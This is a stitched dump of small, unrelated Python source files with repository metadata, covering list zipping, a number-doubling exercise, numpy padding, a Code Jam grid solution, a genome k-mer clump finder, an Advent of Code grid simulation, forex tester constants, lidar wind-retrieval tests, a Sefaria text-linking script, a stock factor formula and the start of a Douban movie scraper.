| no_license | https://github.com/abdallawi/PythonBasic | a7e170f99e1719540e42ba795adf9b66ffa11f46 | 82d4b3cfb08ab68776d796caa901ea970bb22b33 | refs/heads/master | 2020-09-10T08:32:19.969355 | 2019-11-14T14:50:23 | 2019-11-14T14:50:23 | 221,703,467 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | products = ['Xiaomi Mi Electric Pro Scooter',
'AMD Ryzen 7 3700X socket AM4 processor',
'Bowers & Wilkins PX5 hoofdtelefoon',
'Blue Microphones Yeti USB microfoon',
]
prices = [549, 359, 299, 129, 253 , 255]
list_combined = list(zip(products, prices, 'ABCDERHGF'))
print(list_combined)
list_combined = list(zip(list_combined, range(10)))
print(list_combined)
| UTF-8 | Python | false | false | 412 | py | 98 | ZipFunction.py | 91 | 0.640777 | 0.575243 | 0 | 14 | 28.357143 | 56 |
cvhs-cs-2017/practice-exam-Narfanta | 3,315,714,802,549 | a295e4877041c05c283bddc6e6d48da27a5e6bdd | 8e1c1f10127509c66d01bbdd7972693398f07ea2 | /Functions.py | aec5fc5d802360bd96e8811006166cc53d1e2575 | []
| no_license | https://github.com/cvhs-cs-2017/practice-exam-Narfanta | 6495ad68acc7bde6b2f2c7ad7ea30dff0a75c1ee | 98f48071a47d0f2ca1af41115e912eef7e60933a | refs/heads/master | 2021-01-11T17:44:12.801073 | 2017-01-25T19:22:27 | 2017-01-25T19:22:27 | 79,831,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """1. Write a function that will double any integer (n) and return the result"""
def double(n):
n = int(n)*2
return n
print(double(1890))
"""2. Write a program that will (1) ask the user for an input value, (2) take
that and double it and (3) print the result.
Include necessary print statements and address whitespace issues."""
print(double(input('Please enter a number to double and press enter.')))
| UTF-8 | Python | false | false | 415 | py | 6 | Functions.py | 6 | 0.708434 | 0.684337 | 0 | 11 | 36.727273 | 80 |
pororodl/LeetCode | 9,182,640,082,213 | 861442998c3a539201435e39d1ac371c5233dcd1 | c3a968a0fe4efe0a4addc69069c76098c8023fa0 | /gcd.py | 45f8053adc1f2827dceefc0655d36af48e8ebac4 | []
| no_license | https://github.com/pororodl/LeetCode | 207f7ed7d24af1563365c32cf1efd07ed4895da2 | 0e093db4990f56d883f124e4c5a4b7317825049b | refs/heads/master | 2020-09-01T16:11:34.064338 | 2020-04-10T12:59:22 | 2020-04-10T12:59:22 | 219,001,937 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
# 最大公倍数,最小公约数
# def gcd(a,b):
# a, b = (a, b) if a >=b else (b, a)
# if a%b == 0:
# return b
# else :
# return gcd(b,a%b)
#
# def lcm(a,b):
# return a*b//gcd(a,b)
#
# a = 25
# b = 65
# print(gcd(a,b))
# print(lcm(a,b))
# print('{:.2f}'.format(12.1))
if __name__ == '__main__':
# ar = [1,2,3]
# arr = np.array([1,2,3])
arr = [[1,2],[2,3]]
# ar1 = np.pad(ar,(1,2),'constant',constant_values=(8,9))
arr_e = np.pad(arr,((0,2),(1,1)),'constant',constant_values=(8,9))
# print(arr)
# print(arr_e)
print(arr)
print(arr_e)
# print(type(ar))
print(type(arr_e)) | UTF-8 | Python | false | false | 669 | py | 135 | gcd.py | 135 | 0.474498 | 0.42813 | 0 | 30 | 20.6 | 70 |
dr-dos-ok/Code_Jam_Webscraper | 18,554,258,748,154 | 138dc376e6f10998dbd8ee25b55acaa0604d756f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_203/572.py | 3212ccd8510291e20e0c8615047939abbdbfa006 | []
| no_license | https://github.com/dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
def main():
fname = 'A-large.in'
fname_out = 'A-large.out'
fout = open(fname_out, 'wt')
with open(fname) as fin:
T = int(fin.readline().strip())
print("num of test: %d" % T)
for t in range(1, T+1):
R, C = map(int, fin.readline().strip().split(' '))
cakes = []
for r in range(R):
cakes.append(list(fin.readline().strip()))
#print(cakes)
alp = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
for c in alp:
coor = []
for y in range(R):
for x in range(C):
if c == cakes[y][x]:
coor.append((y,x))
for i in range(len(coor)):
for j in range(i+1, len(coor)):
min_y = min(coor[i][0], coor[j][0])
min_x = min(coor[i][1], coor[j][1])
max_y = max(coor[i][0], coor[j][0])
max_x = max(coor[i][1], coor[j][1])
for y in range(min_y, max_y+1):
for x in range(min_x, max_x+1):
cakes[y][x] = c
#print(cakes)
cakes = np.array(cakes)
#for a in alp:
for i in range(R):
for j in range(C):
a = cakes[i][j]
minx, miny, maxx, maxy = 30, 30, -1, -1
for r in range(R):
for c in range(C):
if cakes[r][c] == a:
minx = min(minx, c)
miny = min(miny, r)
maxx = max(maxx, c)
maxy = max(maxy, r)
if 30 in [minx, miny] or -1 in [maxx, maxy]:
continue
x = minx-1
while x >= 0 and all('?' == item for item in cakes[miny:maxy+1,x]):
cakes[miny:maxy+1,x] = a
minx -= 1
x -= 1
x = maxx+1
while x < C and all('?' == item for item in cakes[miny:maxy+1,x]):
cakes[miny:maxy+1,x] = a
maxx += 1
x += 1
y = miny-1
while y >= 0 and all('?' == item for item in cakes[y,minx:maxx+1]):
cakes[y,minx:maxx+1] = a
miny -= 1
y -= 1
y = maxy+1
while y < R and all('?' == item for item in cakes[y,minx:maxx+1]):
cakes[y,minx:maxx+1] = a
maxy += 1
y += 1
for r in range(R):
for c in range(C):
if cakes[r][c] == '?':
print(t)
print(cakes)
fout.write("Case #%d:\n" % (t))
for r in range(R):
for c in range(C):
fout.write('%s'%cakes[r][c])
fout.write('\n')
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 2,377 | py | 60,747 | 572.py | 60,742 | 0.459403 | 0.440892 | 0 | 84 | 26.297619 | 139 |
mtsolmn/lantz-drivers | 10,187,662,433,067 | 1aca2013d76a3dc469cad9da4daa5f3d2824b022 | 571ad4ef5f3eab79a3a061fc94e86bb99b7d48fb | /lantz/drivers/allied_vision/tests/vimbatest.py | 9268f4a1b96e10507f21449e3eadacde420105cb | [
"BSD-3-Clause"
]
| permissive | https://github.com/mtsolmn/lantz-drivers | d155e1887c91fbbe927aea848a178341b98345b9 | f48caf9000ddd08f2abb837d832e341410af4788 | refs/heads/master | 2023-03-01T14:46:09.555086 | 2021-02-11T22:05:41 | 2021-02-11T22:05:41 | 288,908,250 | 0 | 0 | NOASSERTION | true | 2020-08-20T04:44:18 | 2020-08-20T04:44:17 | 2020-06-26T09:15:19 | 2019-01-21T17:38:48 | 651 | 0 | 0 | 0 | null | false | false | from lantz.drivers.allied_vision import list_cameras
if __name__ == '__main__':
print(list_cameras())
| UTF-8 | Python | false | false | 107 | py | 49 | vimbatest.py | 48 | 0.663551 | 0.663551 | 0 | 4 | 25.75 | 52 |
aayushmittal16/Bioinformatics | 3,925,600,109,501 | 8ac0f5c9e7d27cc0ca536f98c6a21daa589d1515 | 89b12d553700347201436c9edab79c0cd80bc1b0 | /FastestClumpFinder.py | 5e017e526881b01f9d8f29a26e0b0547981ae19f | []
| no_license | https://github.com/aayushmittal16/Bioinformatics | 5260f54f6b6e7f3d419ee91f9a53bc642abf378c | b889c75e345b5a9791b10a09fbc750429e9baae9 | refs/heads/master | 2019-08-05T23:27:13.096249 | 2016-05-29T18:39:20 | 2016-05-29T18:39:20 | 59,925,102 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from time import time
def toString(list):
result = ""
for i in list:
result = result + (str)(i) + " "
result = result[0:len(result) - 1]
return result
#Caches all of the k-mer counts in a hashmap and returns the map with max count
def frequencyComputerTwo(text, k):
map = {}
for i in range(0, len(text) - k + 1):
pattern = text[i:i + k]
if pattern in map:
map[pattern] += 1
else:
map[pattern] = 1
return map
#Put all of the frequent k-mers with count = maxCount in a hashset
def fasterFrequentWords(text, k):
frequentPatterns = set()
maxCount = 0
frequencyMap = frequencyComputerTwo(text, k)
for pattern in frequencyMap:
maxCount = max(maxCount,frequencyMap[pattern])
for i in frequencyMap:
if frequencyMap[i] == maxCount:
frequentPatterns.add(i)
return [frequentPatterns, maxCount]
#Use the fastest clump finder algorithm modified to accomodate caching
def fastestClumpFinder(genome, k, L, t):
clump = set()
text = genome[0:L]
frequency_array = frequencyComputerTwo(text, k)
for i in frequency_array:
if frequency_array[i] >= t:
clump.add(i)
for j in range(1, len(genome)-L+1):
first_pattern = genome[j-1:j - 1 + k]
frequency_array[first_pattern] -= 1
last_pattern = genome[j + L - k: j + L]
if last_pattern in frequency_array:
frequency_array[last_pattern] += 1
else:
frequency_array[last_pattern] = 1
if frequency_array[last_pattern] >= t:
clump.add(last_pattern)
return clump
f = open('dataset.txt','r')
arg0 = f.readline().rstrip()
arg1 = f.readline().rstrip().split(" ")
t0 = time()
result = fastestClumpFinder(arg0,9,500,3)
print len(result)
print time() - t0
| UTF-8 | Python | false | false | 1,839 | py | 2 | FastestClumpFinder.py | 1 | 0.614464 | 0.60087 | 0 | 62 | 28.66129 | 79 |
jdiasn/lidarSuit | 6,975,026,929,308 | f5d5697d8ce931ea8faf1d23a46bab561c14d4d6 | 4a4941456ffb6aac9fc2007f2db065de8ef006a7 | /tests/test_wind_prop_retrieval_6_beam.py | bad65c867d9232b0c1e639dffff322622be6e91a | [
"BSD-3-Clause"
]
| permissive | https://github.com/jdiasn/lidarSuit | d0f1d0ae995c3e277fe674d82990371ac7fb7b96 | b6121bfe3a9dca0cbd6b19884372d5eefeea085f | refs/heads/main | 2023-04-16T19:39:05.227399 | 2023-01-04T15:53:46 | 2023-01-04T15:56:51 | 355,915,578 | 11 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
import numpy as np
import xarray as xr
import lidarSuit as lst
def test_six_beam_method_input():
with pytest.raises(TypeError):
lst.SixBeamMethod(data=xr.DataArray(np.array([0, 1])))
def test_get_dummy_six_beam_obj():
elv = np.array([75, 75, 90, 75, 75, 75])
data_elv = xr.DataArray(
elv, dims=("time"), coords={"time": np.arange(len(elv))}
)
azm = np.array([0, 72, 0, 144, 216, 288])
data_azm = xr.DataArray(
azm, dims=("time"), coords={"time": np.arange(len(elv))}
)
data = xr.DataArray(
np.array([1, 1, 1, 1, 1, 1])[:, np.newaxis],
dims=("time", "range"),
coords={"time": np.arange(len(elv)), "range": [1]},
)
data90 = xr.DataArray(
np.array([1, 1, 1, 1, 1, 1])[:, np.newaxis],
dims=("time", "range90"),
coords={"time": np.arange(len(elv)), "range90": [1]},
)
test_ds = xr.Dataset(
{
"elevation": data_elv,
"azimuth": data_azm,
"cnr90": data90,
"gate_index90": data90,
"radial_wind_speed90": data90,
"radial_wind_speed_status90": data90,
"relative_beta90": data90,
"cnr": data,
"gate_index": data,
"radial_wind_speed": data,
"radial_wind_speed_status": data,
"relative_beta": data,
}
)
return lst.GetRestructuredData(test_ds)
@pytest.fixture
def test_get_six_beam_obj():
six_beam_obj = lst.SixBeamMethod(
test_get_dummy_six_beam_obj(), freq=6, freq90=6
)
return six_beam_obj
def test_six_beam_method_m_matrix(test_get_six_beam_obj):
assert np.all(np.isfinite(test_get_six_beam_obj.m_matrix))
def test_six_beam_method_m_matrix_inv(test_get_six_beam_obj):
assert np.all(np.isfinite(test_get_six_beam_obj.m_matrix_inv))
def test_six_beam_method_variance_dic(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.radial_variances.keys()) == 2
def test_six_beam_method_radial_variances90(test_get_six_beam_obj):
assert np.all(
test_get_six_beam_obj.radial_variances["rVariance90"].values == 0
)
def test_six_beam_method_radial_variances(test_get_six_beam_obj):
assert np.all(
test_get_six_beam_obj.radial_variances["rVariance"].values == 0
)
def test_six_beam_method_sigma_matrix(test_get_six_beam_obj):
assert np.all(test_get_six_beam_obj.sigma_matrix == 0)
def test_six_beam_method_variance_dim_time(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.var_comp_ds.time.values) == 1
def test_six_beam_method_variance_dim_range(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.var_comp_ds.range.values) == 1
| UTF-8 | Python | false | false | 2,740 | py | 40 | test_wind_prop_retrieval_6_beam.py | 22 | 0.603285 | 0.573723 | 0 | 109 | 24.137615 | 73 |
Sefaria/Sefaria-Data | 15,187,004,405,958 | d7b9e72af90ceaea361260b6192ca9c31c888226 | 1b9bd441c500e79042c48570035071dc20bfaf44 | /sources/Chatam Sofer on TOrah/match.py | f3bf4bed1039ab37af739b682ad556fc7622dfda | []
| no_license | https://github.com/Sefaria/Sefaria-Data | ad2d1d38442fd68943535ebf79e2603be1d15b2b | 25bf5a05bf52a344aae18075fba7d1d50eb0713a | refs/heads/master | 2023-09-05T00:08:17.502329 | 2023-08-29T08:53:40 | 2023-08-29T08:53:40 | 5,502,765 | 51 | 52 | null | false | 2023-08-29T11:42:31 | 2012-08-22T00:18:38 | 2023-07-28T05:31:47 | 2023-08-29T11:42:30 | 3,978,297 | 75 | 59 | 7 | null | false | false | #encoding=utf-8
import django
django.setup()
import codecs
from sefaria.model import *
from sources.functions import *
import csv
from sefaria.system.exceptions import InputError
from linking_utilities.dibur_hamatchil_matcher import *
from sefaria.system.database import db
def dh_func(dh):
dh = dh.replace("*", "").replace(u"אלקים", u"אלהים").replace(u"ה'", u"יהוה")
return [dh.strip() for dh in dh.split(u"וגו'") if len(dh.strip()) > 5]
dhs = {}
haftara = ""
prev_ref = ""
with open("Chatam_Sofer_on_Torah.csv") as csvf:
for row in UnicodeReader(csvf):
if row[0].startswith("Chatam Sofer"):
ref, text = row
para = ref.split()[0:-1]
ref = u" ".join(ref.split()).replace("Chatam Sofer on Torah, ", "")
parasha = u" ".join(ref.split()[:-1])
if ref != prev_ref:
haftara = ""
if text == u"<b>בהפטרה</b>":
try:
haftara = list(db.parshiot.find({"parasha": parasha}))[0]["haftara"]["ashkenazi"][0]
except IndexError as e:
print e
dhs[haftara] = []
parasha = "Parashat "+parasha if not "Parashat" in parasha else parasha
if parasha not in dhs:
dhs[parasha] = []
poss_dhs = re.findall("<b>(.*?)</b>", text)
dh_list = dh_func(poss_dhs[0]) if len(poss_dhs) >= 1 else [""]
if dh_list:
dhs[parasha] += [(ref.split()[-1], haftara, dh_list)]
prev_ref = ref
links = []
del dhs[""]
for parasha, tuples in dhs.items():
for tuple in tuples:
ref, haftara, dhs = tuple
if not dhs:
continue
base_ref = parasha if not haftara else haftara
try:
base_text = TextChunk(Ref(base_ref), lang='he', vtitle="Tanach with Text Only")
except InputError as e:
print e
continue
boundary_flexibility = 100000 # just need a very high number
for i, match in enumerate(match_ref(base_text, dhs, lambda x: x.split(), boundaryFlexibility=boundary_flexibility)["matches"]):
if match:
parasha = parasha.replace("Parashat ", "")
chatam_ref = "Chatam Sofer on Torah, {} {}".format(parasha, ref)
found_base_ref = match.normal()
link = {"refs": [chatam_ref, found_base_ref], "type": "Commentary", "auto": True, "generated_by": "chatam_sofer_on_torah"}
links.append(link)
post_link(links, server="http://ste.sandbox.sefaria.org")
print len(links)
| UTF-8 | Python | false | false | 2,636 | py | 56,261 | match.py | 1,252 | 0.555513 | 0.549005 | 0 | 69 | 36.855072 | 138 |
mikewoudenberg/AOC-2019 | 9,998,683,898,569 | 216bcb7164d27d8b61e28d34d051a6326e82f8aa | 5bf45a590693f3088e86d5074869d56da4683c66 | /assignment24.py | 6be8b23988b44588576af8abb4a0e16f39212425 | []
| no_license | https://github.com/mikewoudenberg/AOC-2019 | 271cbd2a4b26308e30a0a524cffe3830330ecafe | 5295f9aff5cf2c6d4d5d562409aa7f8583d000ae | refs/heads/master | 2020-09-30T21:57:58.080610 | 2019-12-25T10:38:43 | 2019-12-25T10:38:43 | 227,382,822 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from functools import lru_cache
data = """##.#.
##.#.
##.##
.####
.#...
"""
def buildGrid(data):
grid = [0] * 49
data = data.replace('#', '1').replace('.', '0')
for y, line in enumerate(data.split('\n')):
for x, char in enumerate(line):
grid[toCoord(x, y)] = int(char)
return grid
@lru_cache(maxsize=49)
def toCoord(x, y):
return (y + 1) * 7 + x + 1
grid = buildGrid(data)
def getNeighbours(x, y, grid):
return [grid[toCoord(x+1, y)], grid[toCoord(x-1, y)],
grid[toCoord(x, y + 1)], grid[toCoord(x, y-1)]]
def doStep(grid):
newGrid = grid.copy()
for y in range(5):
for x in range(5):
cell = grid[toCoord(x, y)]
neighbours = sum(getNeighbours(x, y, grid))
if cell and neighbours != 1:
newGrid[toCoord(x, y)] = 0
continue
if (neighbours == 1 or neighbours == 2):
newGrid[toCoord(x, y)] = 1
return newGrid
def getBioDiveristy(grid):
result = []
for y in range(5):
for x in range(5):
result.append(grid[toCoord(x, y)])
return int(''.join(map(str, result[::-1])), 2)
grids = set()
grids.add(tuple(grid))
while True:
newGrid = doStep(grid)
gridTuple = tuple(newGrid)
if gridTuple in grids:
print('Assignment 1: ', getBioDiveristy(newGrid))
break
grids.add(gridTuple)
grid = newGrid
| UTF-8 | Python | false | false | 1,431 | py | 28 | assignment24.py | 28 | 0.536688 | 0.518519 | 0 | 64 | 21.359375 | 59 |
iwabuchiken/WS_Others_prog_D-7_2_2_VIRTUAL.20180918_143948 | 1,906,965,519,632 | bcff78f6b12d61fc2abbc58304db87cbb2afb588 | 60031a174ade98bae9bb3cd15c15abfdb7621b46 | /Admin_Projects/mm/libs_mm/cons_fx.py | b44b76a63449e17d41f3cd76725a574f55126faa | []
| no_license | https://github.com/iwabuchiken/WS_Others_prog_D-7_2_2_VIRTUAL.20180918_143948 | 3f5e8569005b3928e525a4a3638b3281fb374025 | cb51878e90cbe3b172e3d30f103759c9e75a344b | refs/heads/master | 2020-03-28T22:27:53.633793 | 2018-09-18T13:42:00 | 2018-09-18T13:42:00 | 149,234,591 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!C:\WORKS_2\Programs\Python\Python_3.5.1\python.exe
from enum import Enum
from Admin_Projects.definitions import ROOT_DIR
from Admin_Projects.definitions import DPATH_ROOT_CURR
TypeOf_Data_OpenClose = "OpenClose"
'''###################
Used in :
libfx : def get_HighLowDiffs(aryOf_BarDatas, id_Start, id_End)
###################'''
class BarData(Enum):
LABEL_OC = "OC"
LABEL_HL = "HL"
LABEL_RSI = "RSI"
LABEL_MFI = "MFI"
LABEL_BB_MAIN = "BB_Main"
LABEL_BB_1S = "BB_1S"
LABEL_BB_2S = "BB_2S"
LABEL_BB_M1S = "BB_M1S"
LABEL_BB_M2S = "BB_M2S"
ROUND_BB = 4
ROUND_RSI = 4
ROUND_MFI = 4
# HighLowDiff_ID_Start = 1
# HighLowDiff_ID_End = 5
# HighLowDiff_ID_Start = 195
# HighLowDiff_ID_End = 202
# HighLowDiff_ID_Start = 219 # 2017.12.18 13:00
# HighLowDiff_ID_End = 226 # 2017.12.16 06:00
HighLowDiff_ID_Start = 243 # 2017.12.15 13:00
HighLowDiff_ID_End = 250 # 2017.12.15 06:00
class FPath(Enum):
fname_In_CSV = "44_1.14_file-io.EURUSD.Period-H1.Days-1900.Bars-45600.20180511_180935.csv"
dpath_In_CSV = DPATH_ROOT_CURR + "\\data\\csv"
fpath_Out_HighLowDiff = "outputs"
### file : output
dpath_Data_Miscs = DPATH_ROOT_CURR + "/data/miscs"
'''###################
gen peak data
###################'''
fname_Gen_PeakData_Dflt = "49_20_file-io.USDJPY.Period-H1.Days-1200.Bars-28800.20180428_073251.csv"
'''###################
general
###################'''
dpath_LogFile = "C:\\WORKS_2\\WS\\WS_Others\\prog\\D-7\\2_2\\VIRTUAL\\Admin_Projects\\curr\\data\\log"
fname_LogFile = "tester_BUSL.log"
'''###################
BUSL_3
###################'''
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160221.SHRINK-2000.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160221.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.USDJPY.Period-H1.Days-6000.Bars-144000.20180813_113150.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160222.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.USDJPY.Period-H1.Days-6000.Bars-144000.20180813_113150.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.SHRINK-1000.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.SHRINK-1000.csv"
# BUSL_3_FNAME_PEAK_LIST = \
# "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015" \
# + ".SHRINK-100.csv"
BUSL_3_FNAME_PEAK_LIST = \
"44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341" \
+ ".2018-07.csv"
# + ".2018-08.csv"
# BUSL_3_FNAME_PEAK_LIST = \
# "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341" \
# + ".SHRINK-200.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-08.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-07.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_15_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180903_135341.2018-06.csv"
BUSL_3_DPATH_PEAK_LIST = "C:\\WORKS_2\\WS\\WS_Others\\prog\\D-7\\2_2\\VIRTUAL\\Admin_Projects\\curr\\data\\csv_raw"
class Label_ColNames(Enum):
PAIR = 'PAIR'
PERIOD = 'PERIOD'
DAYS = 'DAYS'
SHIFT = 'SHIFT'
class PatternMatch(Enum) :
'''###################
get_AryOf_BarDatas_PatternMatched__RSI__V2
###################'''
PATTERNMATCH_NUMOFSEQUENCE_RSI = 3 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
RANGE_FLAT_RSI = 1.0 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
FLAG_UPDOWN_UP = 1 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
FLAG_UPDOWN_DOWN = 0 # USED IN : get_AryOf_BarDatas_PatternMatched__RSI
'''###################
get_AryOf_BarDatas_PatternMatched__Body_UpDown()
###################'''
VOLUMEOF_BODY = 0.05 # JPY
# VOLUMEOF_BODY = 0.1 # JPY
# VOLUMEOF_BODY = 0.15 # JPY
# VOLUMEOF_BODY = 0.20 # JPY
# VOLUMEOF_BODY = 0.25 # JPY
# VOLUMEOF_BODY = 0.30 # JPY
# VOLUMEOF_BODY = 0.35 # JPY
# VOLUMEOF_BODY = 0.40 # JPY
# VOLUMEOF_BODY = 0.45 # JPY
# VOLUMEOF_BODY = 0.5 # JPY
UPDOWN_PATTERN = [1,1,1,0]
class PairName(Enum) :
pair_Names = [
"USDJPY",
"EURJPY",
"AUDJPY",
"GBPJPY",
"EURUSD",
]
class ParamConstants(Enum):
'''###################
http://127.0.0.1:8000/curr/tester_BuyUps_SellLows/?command=BUSL_3&busl3_action=
key : busl3_action
###################'''
# key
PARAM_BUSL3_KEY__ACTION = "busl3_action"
# values
PARAM_BUSL3_CMD_2UPS = "busl3_command_2ups"
PARAM_BUSL3_CMD_3UPS = "busl3_command_3ups"
# PARAM_BUSL3_CMD_2UPS = "2ups"
'''###################
next_up
###################'''
PARAM_BUSL3_CMD_NEXTUP = "next_up"
PARAM_BUSL3_CMD_NEXTUP_ABOVE_BB_MAIN = "next_up_above_bb_main"
'''######################################
expert : busl3
######################################'''
'''###################
expert : busl3 : 1 : over BB.1S
###################'''
PARAM_BUSL3_CMD_EXPERT_1_OVER_BB_1S = "expert_busl3___1_over_bb_1s"
'''###################
expert : busl3 : 2 : up-up, down-down
###################'''
PARAM_BUSL3_CMD_EXPERT_2_UPUPS_DOWNDOWNS = "expert_busl3___2_upups_downdowns"
'''###################
utils : busl3 : 1 : UpsDowns_in_BB_Ranges
###################'''
PARAM_BUSL3_CMD_UTIL__1_UPSDOWNS_IN_BB_RANGES = \
"util_get_stats__1_upsdowns_in_bb_ranges"
'''######################################
utils : busl3 : 2 : research
######################################'''
'''###################
utils : busl3 : 2 : research / 1 : up-down pattern
###################'''
PARAM_BUSL3_CMD_RES__1_DETECT_PATTERNS__UPSDOWNS = \
"busl3_res__1_detect_patterns__updowns"
class Tester(Enum):
lo_Commands = [
["buy_Ups_Sell_Lows", "Buy ups, sell lows"],
# [1, "Numbering"],
# [2, "De-numbering"],
]
# http://127.0.0.1:8000/curr/tester_BuyUps_SellLows/?command=BUSL_3&
lo_Actions__BUSL__IDs = [
"1" # num of up bars and down bars in each of BB areas
, "2-1" # up-down pattern of 5 bars : log at detect_pattern.Updowns.XXX.log
]
lo_Actions__BUSL = [
[
lo_Actions__BUSL__IDs[0]
,"get stats for BB"
, ParamConstants.PARAM_BUSL3_CMD_UTIL__1_UPSDOWNS_IN_BB_RANGES.value
, "num of up bars and down bars in each of BB areas"
, "20180915_124138"
],
[
lo_Actions__BUSL__IDs[1]
,"res : pattern detection"
, ParamConstants.PARAM_BUSL3_CMD_RES__1_DETECT_PATTERNS__UPSDOWNS.value
, "up-down pattern of 5 bars : log at detect_pattern.Updowns.XXX.log"
, "20180915_125135"
],
]
| UTF-8 | Python | false | false | 8,442 | py | 7 | cons_fx.py | 3 | 0.526297 | 0.41566 | 0 | 230 | 35.704348 | 121 |
menxinren/OFO_intern | 18,837,726,585,271 | 1c301a5eb8a590086c34597316d33794cd87e081 | e09fd6bd63eacb9ae17cd4cd0fcc5bbc0d06644b | /Factor10/Template/factor3.py | c6a8bac6343efd9d198e71951a3b069aa8d00cf0 | []
| no_license | https://github.com/menxinren/OFO_intern | 35d522346a9fc17e9faa927e4bd2715bd3255998 | 2e821547b67ba9a4d0bbdf0eeff7005b618286ca | refs/heads/master | 2020-03-12T05:28:25.832521 | 2018-05-02T02:40:57 | 2018-05-02T02:40:57 | 130,463,933 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #type3 - the intermediate variable of the factor is also a factor
def run_formula(dv):
import pandas as pd
import numpy as np
#计算过去n日最低价和最高价距离今日的天数
t = dv.get_ts('quarter')
t = t.replace([3,6,9,12],np.nan)
temp = dv.get_ts('low')
temp = temp.reset_index([x for x in range(len(temp))])
n = 5
days_min= t[0:n]
for i in range(n,len(temp)):
c = i - temp[i-n:i].idxmin(axis=0)
c = c.to_frame().transpose()
c = c.drop(['trade_date'],axis=1)
days_min = days_min.append(c)
index = t.index
days_min = days_min.set_index(index)
temp = dv.get_ts('high')
temp = temp.reset_index([x for x in range(len(temp))])
days_max= t[0:n]
for i in range(n,len(temp)):
c = i - temp[i-n:i].idxmax(axis=0)
c = c.to_frame().transpose()
c = c.drop(['trade_date'],axis=1)
days_max = days_max.append(c)
days_max = days_max.set_index(index)
dv.remove_field('days_min')
dv.remove_field('days_max')
dv.append_df(days_max,'days_max')
dv.append_df(days_min,'days_min')
factor3 =dv.add_formula('factor3','(days_min<days_max)*(((close-Ts_Min(close,%s))/days_min)-(Ts_Max(close,%s)-Ts_Min(close,%s))/(days_max-days_min))+ (days_min>days_max)*((Ts_Max(close,%s)-Ts_Min(close,%s))/(days_min-days_max)-((Ts_Max(close,%s)-close)/days_max))'%(n,n,n,n,n,n),is_quarterly=False, add_data=True)
return factor3
| UTF-8 | Python | false | false | 1,351 | py | 21 | factor3.py | 18 | 0.642803 | 0.630617 | 0 | 37 | 34.459459 | 314 |
Yan199405/Python_note | 11,235,634,450,937 | c353b656f707a90451d1f77d7ba7a47d9c5e78df | 61459ef393c252cc52dc56d5ebafff7e055579aa | /图灵学院/v20.py | 53a3c4bfb9b21ba76bd6febe15b8b9078ebce56e | []
| no_license | https://github.com/Yan199405/Python_note | 5e56824b6ec347ab8af4f04b5070bdc5e6685b80 | d8fd0a83da280f80e7a3e9c535787afa7722e140 | refs/heads/master | 2020-06-13T01:17:33.696802 | 2019-08-12T00:28:17 | 2019-08-12T00:28:17 | 194,485,922 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
爬取豆瓣电影数据
了解ajax的基本
'''
from urllib import request
import json
url = 'https://movie.douban.com/j/chart/top_list?type=11&interval_id=100%3A90&action=&start=0&limit=1'
